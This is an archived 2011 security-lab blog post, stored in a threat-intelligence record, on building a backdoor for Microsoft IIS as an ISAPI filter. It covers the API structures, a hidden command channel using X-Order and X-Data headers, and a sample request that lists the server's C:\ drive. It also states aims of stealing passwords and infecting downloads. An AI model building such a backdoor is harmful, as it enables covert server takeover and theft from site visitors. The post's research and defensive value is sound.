{
	"id": "7c19f6e3-0f32-4a83-af4a-a29cd84bd8e4",
	"created_at": "2026-04-06T01:29:52.403053Z",
	"updated_at": "2026-04-10T13:11:42.863012Z",
	"deleted_at": null,
	"sha1_hash": "57ef03ebb506d435c599ac93691ad7462cfc8d1e",
	"title": "Sogeti ESEC Lab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 112840,
	"plain_text": "Sogeti ESEC Lab\r\nBy Sogeti ESEC Lab\r\nArchived: 2026-04-06 00:23:11 UTC\r\nIIS Backdoor\r\nWed 02 February 2011 by julien\r\nIn this article I will explain how I designed a rootkit for Microsoft Internet Information Services (IIS). The\r\nquestion is: why a backdoor in a web server?\r\nFirst obvious but useless answer: because we can.\r\nOk, let us give a more clever answer. The purpose of backdooring a web server is twofold:\r\nIt allows the attacker to access data sent by the clients. For instance, if the web site is password protected,\r\nwe can retrieve this password.\r\nIt allows the attacker to backdoor on the fly anything sent from the server to the web client.\r\nThis second point is especially interesting as it allows the attacker to inject the proper exploit according to the web\r\nbrowser requesting the web page, or to infect an executable downloaded from the server.\r\nIIS backdoor\r\nWhat is IIS\r\nIIS is Microsoft's web server; it is an important piece of Microsoft's web-based technologies such as OWA. Many\r\nversions have been released from the first (IIS 1.0 under Windows NT 3.51) to the latest (IIS 7.5 under Windows\r\nServer 2008). It is widely deployed over the Internet and on company Intranets.\r\nIIS enrichment\r\nMicrosoft has defined an API known as ISAPI (Internet Server Application Programming Interface) to help\r\ndevelopers add features to IIS. Two types of components can be added to IIS: extensions or filters.\r\nISAPI Extensions\r\nExtensions are DLLs that export 3 functions:\r\nGetExtensionVersion\r\nHttpExtensionProc\r\nTerminateExtension\r\nhttps://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html\r\nPage 1 of 5\n\nExtensions are applications running inside IIS. They are loaded by IIS every time it needs them. Extensions access\r\nthe content of a request and are responsible for responding to the client. 
For example, if a client requests the page\r\nhttp://mydomain/myextension where myextension is your registered extension, the HttpExtensionProc of your\r\nextension will be called. IIS will provide it the following structure:\r\ntypedef struct _EXTENSION_CONTROL_BLOCK {\r\n DWORD cbSize;\r\n DWORD dwVersion;\r\n HCONN connID;\r\n DWORD dwHttpStatusCode;\r\n char lpszLogData[HSE_LOG_BUFFER_LEN];\r\n LPSTR lpszMethod;\r\n LPSTR lpszQueryString;\r\n LPSTR lpszPathInfo;\r\n LPSTR lpszPathTranslated;\r\n DWORD cbTotalBytes;\r\n DWORD cbAvailable;\r\n LPBYTE lpbData;\r\n LPSTR lpszContentType;\r\n BOOL (WINAPI * GetServerVariable) ();\r\n BOOL (WINAPI * WriteClient) ();\r\n BOOL (WINAPI * ReadClient) ();\r\n BOOL (WINAPI * ServerSupportFunction) ();\r\n} EXTENSION_CONTROL_BLOCK;\r\nThis way HttpExtensionProc can read data from the request, process it and send back a response using the callback\r\nfunctions ReadClient and WriteClient.\r\nISAPI Filters\r\nFilters are DLLs that export 3 functions:\r\nGetFilterVersion\r\nHttpFilterProc\r\nTerminateFilter\r\nFilters are registered for a number of events; each time an event occurs during the lifetime of a request, the\r\nHttpFilterProc is called. Here is an incomplete list of events that a filter can register for:\r\nSF_NOTIFY_PREPROC_HEADERS: happens when IIS has finished preprocessing headers.\r\nSF_NOTIFY_SEND_RESPONSE: happens when IIS is ready to send the response to the client.\r\nSF_NOTIFY_END_OF_REQUEST: happens when a request has ended its lifecycle.\r\nSF_NOTIFY_LOG: happens before IIS writes the log for the current request.\r\nOnce an event for which a filter is registered occurs, the filter's HttpFilterProc is called and is provided a\r\nstructure, depending on the type of event. 
For example, if it is a SF_NOTIFY_END_OF_REQUEST event, the\r\nfollowing structure is passed to the filter by IIS:\r\ntypedef struct _HTTP_FILTER_LOG {\r\n const char * pszClientHostName;\r\n const char * pszClientUserName;\r\n const char * pszServerName;\r\n const char * pszOperation;\r\n const char * pszTarget;\r\n const char * pszParameters;\r\n DWORD dwHttpStatus;\r\n DWORD dwWin32Status;\r\n DWORD dwBytesSent;\r\n DWORD dwBytesRecvd;\r\n DWORD msTimeForProcessing;\r\n} HTTP_FILTER_LOG, * PHTTP_FILTER_LOG;\r\nThis structure contains all the pieces of information a filter needs to log the incoming request.\r\nExtensions and Filters overview\r\nThe following scheme is a general presentation of how filters and extensions are reached by a client's request:\r\nBackdoor Implementation\r\nThe backdoor works on a very simple principle. Clients send requests with special headers containing orders\r\nand the filter replies by adding data to the outgoing response. The filter is registered for the\r\nSF_NOTIFY_PREPROC_HEADERS and SF_NOTIFY_SEND_RAW_DATA events. Once an incoming request\r\narrives, the filter checks whether the headers X-ORDER and/or X-DATA are present in the request; if so, and if\r\nthe order is known, it executes it and replies. As our filter is notified for any page of the server, I can request any\r\npage on the server to communicate with my filter. 
I just need to add special headers to a regular request.\r\nIf I request a simple page (here /pwet.htm) without adding headers, IIS behaves normally, i.e. the IIS response is\r\nas follows:\r\nGET /pwet.htm HTTP/1.1\r\nHost: 192.168.73.143\r\nAccept-Encoding: identity\r\nConnection: Keep-Alive\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: */*\r\nHTTP/1.1 200 OK\r\nDate: Thu, 03 Feb 2011 12:16:50 GMT\r\nContent-Length: 31\r\nContent-Type: text/html\r\nLast-Modified: Mon, 21 Jun 2010 11:53:19 GMT\r\nAccept-Ranges: bytes\r\nETag: \"963779573811cb1:994\"\r\nServer: Microsoft-IIS/6.0\r\n\u003chtml\u003e\r\nPouetpouet\r\n\u003c/html\u003e\r\nBut if I request the same page and add an order (here the order is \"ListDir\" of base64(\"C:\")), then I have the\r\nfollowing result:\r\nGET /pwet.htm HTTP/1.1\r\nHost: 192.168.73.143\r\nAccept-Encoding: identity\r\nX-Order: ListDir\r\nConnection: Keep-Alive\r\nX-Data: Qzpc\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: */*\r\nHTTP/1.1 200 OK\r\nDate: Thu, 03 Feb 2011 12:16:57 GMT\r\nContent-Length: 353\r\nX-Resp: OK\r\nContent-Type: text/html\r\nLast-Modified: Mon, 21 Jun 2010 11:53:19 GMT\r\nAccept-Ranges: bytes\r\nETag: \"963779573811cb1:994\"\r\nServer: Microsoft-IIS/6.0\r\n\u003chtml\u003e\r\nPouetpouet\r\n\u003c/html\u003e\r\n[F] C:\\AUTOEXEC.BAT\r\n[F] C:\\boot.ini\r\n[F] C:\\bootfont.bin\r\n[F] C:\\CONFIG.SYS\r\n[D] C:\\Documents and Settings\r\n[D] C:\\Inetpub\r\n[F] C:\\IO.SYS\r\n[F] C:\\MSDOS.SYS\r\n[F] C:\\NTDETECT.COM\r\n[F] C:\\ntldr\r\n[F] C:\\pagefile.sys\r\n[D] C:\\Program Files\r\n[D] C:\\System Volume Information\r\n[D] C:\\WINDOWS\r\n[D] C:\\wmpub\r\nSo, backdooring an IIS web server is not that difficult and can give you a lot of opportunities...\r\nSource: 
https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html"
	],
	"report_names": [
		"iis-backdoor.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.pdf",
		"text": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.txt",
		"img": "https://archive.orkl.eu/57ef03ebb506d435c599ac93691ad7462cfc8d1e.jpg"
	}
}